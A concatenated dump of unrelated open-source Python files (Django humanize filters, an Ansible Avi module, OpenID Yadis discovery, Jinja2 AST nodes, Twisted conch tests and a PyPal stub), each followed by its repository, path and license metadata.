tzinfo = getattr(value, 'tzinfo', None)
value = date(value.year, value.month, value.day)
except AttributeError:
# Passed value wasn't a date object
return value
except ValueError:
# Date arguments out of range
return value
today = datetime.now(tzinfo).date()
delta = value - today
if delta.days == 0:
return _('today')
elif delta.days == 1:
return _('tomorrow')
elif delta.days == -1:
return _('yesterday')
return defaultfilters.date(value, arg)
# This filter doesn't require expects_localtime=True because it deals properly
# with both naive and aware datetimes. Therefore avoid the cost of conversion.
@register.filter
def naturaltime(value):
"""
For date and time values shows how many seconds, minutes or hours ago
compared to current timestamp returns representing string.
"""
if not isinstance(value, date): # datetime is a subclass of date
return value
now = datetime.now(utc if is_aware(value) else None)
if value < now:
delta = now - value
if delta.days != 0:
return pgettext(
'naturaltime', '%(delta)s ago'
) % {'delta': defaultfilters.timesince(value, now)}
elif delta.seconds == 0:
return _('now')
elif delta.seconds < 60:
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a second ago', '%(count)s seconds ago', delta.seconds
) % {'count': delta.seconds}
elif delta.seconds // 60 < 60:
count = delta.seconds // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a minute ago', '%(count)s minutes ago', count
) % {'count': count}
else:
count = delta.seconds // 60 // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'an hour ago', '%(count)s hours ago', count
) % {'count': count}
else:
delta = value - now
if delta.days != 0:
return pgettext(
'naturaltime', '%(delta)s from now'
) % {'delta': defaultfilters.timeuntil(value, now)}
elif delta.seconds == 0:
return _('now')
elif delta.seconds < 60:
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a second from now', '%(count)s seconds from now', delta.seconds
) % {'count': delta.seconds}
elif delta.seconds // 60 < 60:
count = delta.seconds // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'a minute from now', '%(count)s minutes from now', count
) % {'count': count}
else:
count = delta.seconds // 60 // 60
return ungettext(
# Translators: please keep a non-breaking space (U+00A0)
# between count and time unit.
'an hour from now', '%(count)s hours from now', count
) % {'count': count}
|
bsd-3-clause
|
michael-dev2rights/ansible
|
lib/ansible/modules/network/avi/avi_prioritylabels.py
|
27
|
3614
|
#!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_prioritylabels
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of PriorityLabels Avi RESTful Object
description:
- This module is used to configure PriorityLabels object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
cloud_ref:
description:
- It is a reference to an object of type cloud.
description:
description:
- A description of the priority labels.
equivalent_labels:
description:
- Equivalent priority labels in descending order.
name:
description:
- The name of the priority labels.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the priority labels.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create PriorityLabels object
avi_prioritylabels:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_prioritylabels
"""
RETURN = '''
obj:
description: PriorityLabels (api/prioritylabels) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
cloud_ref=dict(type='str',),
description=dict(type='str',),
equivalent_labels=dict(type='list',),
name=dict(type='str', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'prioritylabels',
set([]))
if __name__ == '__main__':
main()
|
gpl-3.0
|
wd5/jangr
|
openid/yadis/discover.py
|
143
|
4445
|
# -*- test-case-name: openid.test.test_yadis_discover -*-
__all__ = ['discover', 'DiscoveryResult', 'DiscoveryFailure']
from cStringIO import StringIO
from openid import fetchers
from openid.yadis.constants import \
YADIS_HEADER_NAME, YADIS_CONTENT_TYPE, YADIS_ACCEPT_HEADER
from openid.yadis.parsehtml import MetaNotFound, findHTMLMeta
class DiscoveryFailure(Exception):
"""Raised when a YADIS protocol error occurs in the discovery process"""
identity_url = None
def __init__(self, message, http_response):
Exception.__init__(self, message)
self.http_response = http_response
class DiscoveryResult(object):
"""Contains the result of performing Yadis discovery on a URI"""
# The URI that was passed to the fetcher
request_uri = None
# The result of following redirects from the request_uri
normalized_uri = None
# The URI from which the response text was returned (set to
# None if there was no XRDS document found)
xrds_uri = None
# The content-type returned with the response_text
content_type = None
# The document returned from the xrds_uri
response_text = None
def __init__(self, request_uri):
"""Initialize the state of the object
sets all attributes to None except the request_uri
"""
self.request_uri = request_uri
def usedYadisLocation(self):
"""Was the Yadis protocol's indirection used?"""
return self.normalized_uri != self.xrds_uri
def isXRDS(self):
"""Is the response text supposed to be an XRDS document?"""
return (self.usedYadisLocation() or
self.content_type == YADIS_CONTENT_TYPE)
def discover(uri):
"""Discover services for a given URI.
@param uri: The identity URI as a well-formed http or https
URI. The well-formedness and the protocol are not checked, but
the results of this function are undefined if those properties
do not hold.
@return: DiscoveryResult object
@raises Exception: Any exception that can be raised by fetching a URL with
the given fetcher.
@raises DiscoveryFailure: When the HTTP response does not have a 200 code.
"""
result = DiscoveryResult(uri)
resp = fetchers.fetch(uri, headers={'Accept': YADIS_ACCEPT_HEADER})
if resp.status not in (200, 206):
raise DiscoveryFailure(
'HTTP Response status from identity URL host is not 200. '
'Got status %r' % (resp.status,), resp)
# Note the URL after following redirects
result.normalized_uri = resp.final_url
# Attempt to find out where to go to discover the document
# or if we already have it
result.content_type = resp.headers.get('content-type')
result.xrds_uri = whereIsYadis(resp)
if result.xrds_uri and result.usedYadisLocation():
resp = fetchers.fetch(result.xrds_uri)
if resp.status not in (200, 206):
exc = DiscoveryFailure(
'HTTP Response status from Yadis host is not 200. '
'Got status %r' % (resp.status,), resp)
exc.identity_url = result.normalized_uri
raise exc
result.content_type = resp.headers.get('content-type')
result.response_text = resp.body
return result
def whereIsYadis(resp):
"""Given a HTTPResponse, return the location of the Yadis document.
May be the URL just retrieved, another URL, or None, if I can't
find any.
[non-blocking]
@returns: str or None
"""
# Attempt to find out where to go to discover the document
# or if we already have it
content_type = resp.headers.get('content-type')
# According to the spec, the content-type header must be an exact
# match, or else we have to look for an indirection.
if (content_type and
content_type.split(';', 1)[0].lower() == YADIS_CONTENT_TYPE):
return resp.final_url
else:
# Try the header
yadis_loc = resp.headers.get(YADIS_HEADER_NAME.lower())
if not yadis_loc:
# Parse as HTML if the header is missing.
#
# XXX: do we want to do something with content-type, like
# have a whitelist or a blacklist (for detecting that it's
# HTML)?
try:
yadis_loc = findHTMLMeta(StringIO(resp.body))
except MetaNotFound:
pass
return yadis_loc
|
bsd-3-clause
|
antsant/namebench
|
nb_third_party/jinja2/nodes.py
|
207
|
27369
|
# -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from itertools import chain, izip
from collections import deque
from jinja2.utils import Markup
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
class Impossible(Exception):
"""Raised if the node could not perform a requested action."""
class NodeType(type):
"""A metaclass for nodes that handles the field and attribute
inheritance. fields and attributes from the parent class are
automatically forwarded to the child."""
def __new__(cls, name, bases, d):
for attr in 'fields', 'attributes':
storage = []
storage.extend(getattr(bases[0], attr, ()))
storage.extend(d.get(attr, ()))
assert len(bases) == 1, 'multiple inheritance not allowed'
assert len(storage) == len(set(storage)), 'layout conflict'
d[attr] = tuple(storage)
d.setdefault('abstract', False)
return type.__new__(cls, name, bases, d)
class EvalContext(object):
"""Holds evaluation time information. Custom attributes can be attached
to it in extensions.
"""
def __init__(self, environment, template_name=None):
if callable(environment.autoescape):
self.autoescape = environment.autoescape(template_name)
else:
self.autoescape = environment.autoescape
self.volatile = False
def save(self):
return self.__dict__.copy()
def revert(self, old):
self.__dict__.clear()
self.__dict__.update(old)
def get_eval_context(node, ctx):
if ctx is None:
if node.environment is None:
raise RuntimeError('if no eval context is passed, the '
'node must have an attached '
'environment.')
return EvalContext(node.environment)
return ctx
class Node(object):
"""Baseclass for all Jinja2 nodes. There are a number of nodes available
of different types. There are three major types:
- :class:`Stmt`: statements
- :class:`Expr`: expressions
- :class:`Helper`: helper nodes
- :class:`Template`: the outermost wrapper node
All nodes have fields and attributes. Fields may be other nodes, lists,
or arbitrary values. Fields are passed to the constructor as regular
positional arguments, attributes as keyword arguments. Each node has
two attributes: `lineno` (the line number of the node) and `environment`.
The `environment` attribute is set at the end of the parsing process for
all nodes automatically.
"""
__metaclass__ = NodeType
fields = ()
attributes = ('lineno', 'environment')
abstract = True
def __init__(self, *fields, **attributes):
if self.abstract:
raise TypeError('abstract nodes are not instanciable')
if fields:
if len(fields) != len(self.fields):
if not self.fields:
raise TypeError('%r takes 0 arguments' %
self.__class__.__name__)
raise TypeError('%r takes 0 or %d argument%s' % (
self.__class__.__name__,
len(self.fields),
len(self.fields) != 1 and 's' or ''
))
for name, arg in izip(self.fields, fields):
setattr(self, name, arg)
for attr in self.attributes:
setattr(self, attr, attributes.pop(attr, None))
if attributes:
raise TypeError('unknown attribute %r' %
iter(attributes).next())
def iter_fields(self, exclude=None, only=None):
"""This method iterates over all fields that are defined and yields
``(key, value)`` tuples. Per default all fields are returned, but
it's possible to limit that to some fields by providing the `only`
parameter or to exclude some using the `exclude` parameter. Both
should be sets or tuples of field names.
"""
for name in self.fields:
if (exclude is only is None) or \
(exclude is not None and name not in exclude) or \
(only is not None and name in only):
try:
yield name, getattr(self, name)
except AttributeError:
pass
def iter_child_nodes(self, exclude=None, only=None):
"""Iterates over all direct child nodes of the node. This iterates
over all fields and yields the values of they are nodes. If the value
of a field is a list all the nodes in that list are returned.
"""
for field, item in self.iter_fields(exclude, only):
if isinstance(item, list):
for n in item:
if isinstance(n, Node):
yield n
elif isinstance(item, Node):
yield item
def find(self, node_type):
"""Find the first node of a given type. If no such node exists the
return value is `None`.
"""
for result in self.find_all(node_type):
return result
def find_all(self, node_type):
"""Find all the nodes of a given type. If the type is a tuple,
the check is performed for any of the tuple items.
"""
for child in self.iter_child_nodes():
if isinstance(child, node_type):
yield child
for result in child.find_all(node_type):
yield result
def set_ctx(self, ctx):
"""Reset the context of a node and all child nodes. Per default the
parser will all generate nodes that have a 'load' context as it's the
most common one. This method is used in the parser to set assignment
targets and other nodes to a store context.
"""
todo = deque([self])
while todo:
node = todo.popleft()
if 'ctx' in node.fields:
node.ctx = ctx
todo.extend(node.iter_child_nodes())
return self
def set_lineno(self, lineno, override=False):
"""Set the line numbers of the node and children."""
todo = deque([self])
while todo:
node = todo.popleft()
if 'lineno' in node.attributes:
if node.lineno is None or override:
node.lineno = lineno
todo.extend(node.iter_child_nodes())
return self
def set_environment(self, environment):
"""Set the environment for all nodes."""
todo = deque([self])
while todo:
node = todo.popleft()
node.environment = environment
todo.extend(node.iter_child_nodes())
return self
def __eq__(self, other):
return type(self) is type(other) and \
tuple(self.iter_fields()) == tuple(other.iter_fields())
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
arg in self.fields)
)
class Stmt(Node):
"""Base node for all statements."""
abstract = True
class Helper(Node):
"""Nodes that exist in a specific context only."""
abstract = True
class Template(Node):
"""Node that represents a template. This must be the outermost node that
is passed to the compiler.
"""
fields = ('body',)
class Output(Stmt):
"""A node that holds multiple expressions which are then printed out.
This is used both for the `print` statement and the regular template data.
"""
fields = ('nodes',)
class Extends(Stmt):
"""Represents an extends statement."""
fields = ('template',)
class For(Stmt):
"""The for loop. `target` is the target for the iteration (usually a
:class:`Name` or :class:`Tuple`), `iter` the iterable. `body` is a list
of nodes that are used as loop-body, and `else_` a list of nodes for the
`else` block. If no else node exists it has to be an empty list.
For filtered nodes an expression can be stored as `test`, otherwise `None`.
"""
fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')
class If(Stmt):
"""If `test` is true, `body` is rendered, else `else_`."""
fields = ('test', 'body', 'else_')
class Macro(Stmt):
"""A macro definition. `name` is the name of the macro, `args` a list of
arguments and `defaults` a list of defaults if there are any. `body` is
a list of nodes for the macro body.
"""
fields = ('name', 'args', 'defaults', 'body')
class CallBlock(Stmt):
"""Like a macro without a name but a call instead. `call` is called with
the unnamed macro as `caller` argument this node holds.
"""
fields = ('call', 'args', 'defaults', 'body')
class FilterBlock(Stmt):
"""Node for filter sections."""
fields = ('body', 'filter')
class Block(Stmt):
"""A node that represents a block."""
fields = ('name', 'body', 'scoped')
class Include(Stmt):
"""A node that represents the include tag."""
fields = ('template', 'with_context', 'ignore_missing')
class Import(Stmt):
"""A node that represents the import tag."""
fields = ('template', 'target', 'with_context')
class FromImport(Stmt):
"""A node that represents the from import tag. It's important to not
pass unsafe names to the name attribute. The compiler translates the
attribute lookups directly into getattr calls and does *not* use the
subscript callback of the interface. As exported variables may not
start with double underscores (which the parser asserts) this is not a
problem for regular Jinja code, but if this node is used in an extension
extra care must be taken.
The list of names may contain tuples if aliases are wanted.
"""
fields = ('template', 'names', 'with_context')
class ExprStmt(Stmt):
"""A statement that evaluates an expression and discards the result."""
fields = ('node',)
class Assign(Stmt):
"""Assigns an expression to a target."""
fields = ('target', 'node')
class Expr(Node):
"""Baseclass for all expressions."""
abstract = True
def as_const(self, eval_ctx=None):
"""Return the value of the expression as constant or raise
:exc:`Impossible` if this was not possible.
An :class:`EvalContext` can be provided, if none is given
a default context is created which requires the nodes to have
an attached environment.
.. versionchanged:: 2.4
the `eval_ctx` parameter was added.
"""
raise Impossible()
def can_assign(self):
"""Check if it's possible to assign something to this node."""
return False
class BinExpr(Expr):
"""Baseclass for all binary expressions."""
fields = ('left', 'right')
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
f = _binop_to_func[self.operator]
try:
return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
except:
raise Impossible()
class UnaryExpr(Expr):
"""Baseclass for all unary expressions."""
fields = ('node',)
operator = None
abstract = True
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
f = _uaop_to_func[self.operator]
try:
return f(self.node.as_const(eval_ctx))
except:
raise Impossible()
class Name(Expr):
"""Looks up a name or stores a value in a name.
The `ctx` of the node can be one of the following values:
- `store`: store a value in the name
- `load`: load that name
- `param`: like `store` but if the name was defined as function parameter.
"""
fields = ('name', 'ctx')
def can_assign(self):
return self.name not in ('true', 'false', 'none',
'True', 'False', 'None')
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
representation (objects where ``eval(repr(x)) == x`` is true).
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
if get_eval_context(self, eval_ctx).autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
"""For loop unpacking and some other things like multiple arguments
for subscripts. Like for :class:`Name` `ctx` specifies if the tuple
is used for loading the names or storing.
"""
fields = ('items', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return tuple(x.as_const(eval_ctx) for x in self.items)
def can_assign(self):
for item in self.items:
if not item.can_assign():
return False
return True
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
"""A conditional expression (inline if expression). (``{{
foo if bar else baz }}``)
"""
fields = ('test', 'expr1', 'expr2')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.test.as_const(eval_ctx):
return self.expr1.as_const(eval_ctx)
# if we evaluate to an undefined object, we better do that at runtime
if self.expr2 is None:
raise Impossible()
return self.expr2.as_const(eval_ctx)
class Filter(Expr):
"""This node applies a filter on an expression. `name` is the name of
the filter, the rest of the fields are the same as for :class:`Call`.
If the `node` of a filter is `None` the contents of the last buffer are
filtered. Buffers are created by macros and filter blocks.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile or self.node is None:
raise Impossible()
# we have to be careful here because we call filter_ below.
# if this variable would be called filter, 2to3 would wrap the
# call in a list beause it is assuming we are talking about the
# builtin filter function here which no longer returns a list in
# python 3. because of that, do not rename filter_ to filter!
filter_ = self.environment.filters.get(self.name)
if filter_ is None or getattr(filter_, 'contextfilter', False):
raise Impossible()
obj = self.node.as_const(eval_ctx)
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(filter_, 'evalcontextfilter', False):
args.insert(0, eval_ctx)
elif getattr(filter_, 'environmentfilter', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except:
raise Impossible()
try:
return filter_(obj, *args, **kwargs)
except:
raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
"""Calls an expression. `args` is a list of arguments, `kwargs` a list
of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
and `dyn_kwargs` has to be either `None` or a node that is used as
node for dynamic positional (``*args``) or keyword (``**kwargs``)
arguments.
"""
fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
obj = self.node.as_const(eval_ctx)
# don't evaluate context functions
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(obj, 'contextfunction', False):
raise Impossible()
elif getattr(obj, 'evalcontextfunction', False):
args.insert(0, eval_ctx)
elif getattr(obj, 'environmentfunction', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except:
raise Impossible()
try:
return obj(*args, **kwargs)
except:
raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
"""Get an attribute or item from an expression that is a ascii-only
bytestring and prefer the attribute.
"""
fields = ('node', 'attr', 'ctx')
def as_const(self, eval_ctx=None):
if self.ctx != 'load':
raise Impossible()
try:
eval_ctx = get_eval_context(self, eval_ctx)
return self.environment.getattr(self.node.as_const(eval_ctx), arg)
except:
raise Impossible()
def can_assign(self):
return False
class Slice(Expr):
"""Represents a slice object. This must only be used as argument for
:class:`Subscript`.
"""
fields = ('start', 'stop', 'step')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
def const(obj):
if obj is None:
return None
return obj.as_const(eval_ctx)
return slice(const(self.start), const(self.stop), const(self.step))
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(unicode(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
"""Compares an expression with some other expressions. `ops` must be a
list of :class:`Operand`\s.
"""
fields = ('expr', 'ops')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
result = value = self.expr.as_const(eval_ctx)
try:
for op in self.ops:
new_value = op.expr.as_const(eval_ctx)
result = _cmpop_to_func[op.op](value, new_value)
value = new_value
except:
raise Impossible()
return result
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
"""Divides the left by the right node and truncates conver the
result into an integer by truncating.
"""
operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
template and is not threated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new); del _failing_new
|
apache-2.0
|
flyfei/python-for-android
|
python-modules/twisted/twisted/conch/test/test_openssh_compat.py
|
60
|
3381
|
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.openssh_compat}.
"""
import os
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath
from twisted.python.compat import set
try:
import Crypto.Cipher.DES3
import pyasn1
except ImportError:
OpenSSHFactory = None
else:
from twisted.conch.openssh_compat.factory import OpenSSHFactory
from twisted.conch.test import keydata
from twisted.test.test_process import MockOS
class OpenSSHFactoryTests(TestCase):
"""
Tests for L{OpenSSHFactory}.
"""
if getattr(os, "geteuid", None) is None:
skip = "geteuid/seteuid not available"
elif OpenSSHFactory is None:
skip = "Cannot run without PyCrypto or PyASN1"
def setUp(self):
self.factory = OpenSSHFactory()
self.keysDir = FilePath(self.mktemp())
self.keysDir.makedirs()
self.factory.dataRoot = self.keysDir.path
self.keysDir.child("ssh_host_foo").setContent("foo")
self.keysDir.child("bar_key").setContent("foo")
self.keysDir.child("ssh_host_one_key").setContent(
keydata.privateRSA_openssh)
self.keysDir.child("ssh_host_two_key").setContent(
keydata.privateDSA_openssh)
self.keysDir.child("ssh_host_three_key").setContent(
"not a key content")
self.keysDir.child("ssh_host_one_key.pub").setContent(
keydata.publicRSA_openssh)
self.mockos = MockOS()
self.patch(os, "seteuid", self.mockos.seteuid)
self.patch(os, "setegid", self.mockos.setegid)
def test_getPublicKeys(self):
"""
L{OpenSSHFactory.getPublicKeys} should return the available public keys
in the data directory
"""
keys = self.factory.getPublicKeys()
self.assertEquals(len(keys), 1)
keyTypes = keys.keys()
self.assertEqual(keyTypes, ['ssh-rsa'])
def test_getPrivateKeys(self):
"""
L{OpenSSHFactory.getPrivateKeys} should return the available private
keys in the data directory.
"""
keys = self.factory.getPrivateKeys()
self.assertEquals(len(keys), 2)
keyTypes = keys.keys()
self.assertEqual(set(keyTypes), set(['ssh-rsa', 'ssh-dss']))
self.assertEquals(self.mockos.seteuidCalls, [])
self.assertEquals(self.mockos.setegidCalls, [])
def test_getPrivateKeysAsRoot(self):
"""
L{OpenSSHFactory.getPrivateKeys} should switch to root if the keys
aren't readable by the current user.
"""
keyFile = self.keysDir.child("ssh_host_two_key")
# Fake permission error by changing the mode
keyFile.chmod(0000)
self.addCleanup(keyFile.chmod, 0777)
# And restore the right mode when seteuid is called
savedSeteuid = os.seteuid
def seteuid(euid):
keyFile.chmod(0777)
return savedSeteuid(euid)
self.patch(os, "seteuid", seteuid)
keys = self.factory.getPrivateKeys()
self.assertEquals(len(keys), 2)
keyTypes = keys.keys()
self.assertEqual(set(keyTypes), set(['ssh-rsa', 'ssh-dss']))
self.assertEquals(self.mockos.seteuidCalls, [0, os.geteuid()])
self.assertEquals(self.mockos.setegidCalls, [0, os.getegid()])
|
apache-2.0
|
byteface/sing
|
core/PyPal.py
|
1
|
16532
|
"""
PyPal.py
@author: byteface
"""
class PyPal(object):
"""
PyPal is the heart for all pypals :)
"""
